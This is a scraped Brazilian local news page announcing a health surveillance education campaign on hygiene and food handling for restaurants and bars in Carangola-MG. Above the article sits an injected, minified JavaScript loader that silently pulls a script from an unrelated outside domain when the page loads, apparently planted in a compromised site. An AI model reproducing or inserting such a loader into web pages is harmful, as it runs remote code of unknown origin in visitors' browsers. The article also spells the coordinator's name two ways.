;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Campanha Educativa Vigilância Sanitária Carangola -MG. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Campanha Educativa Vigilância Sanitária Carangola -MG.

A Vigilância Sanitária iniciará no próximo dia 03 de Abril uma campanha educativa em estabelecimentos como restaurantes, bares e lanchonetes, com o objetivo de conscientizar os proprietários e funcionários sobre a importância das medidas de prevenção à saúde pública.

A iniciativa faz parte de uma série de ações que a Vigilância Sanitária tem adotado para garantir a segurança alimentar e a qualidade dos serviços prestados aos consumidores. A campanha irá abordar temas como higiene pessoal, manipulação de alimentos, armazenamento correto de produtos e limpeza do ambiente de trabalho.

De acordo com a coordenadora da Vigilância Sanitária Claudiane Mendes, a campanha é fundamental para garantir que os estabelecimentos cumpram as normas sanitárias e ofereçam um ambiente seguro e saudável para os clientes.

“Queremos conscientizar os proprietários e funcionários sobre a importância das boas práticas de higiene e manipulação de alimentos, e assim evitar riscos à saúde pública”, disse Claudiana Mendes

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.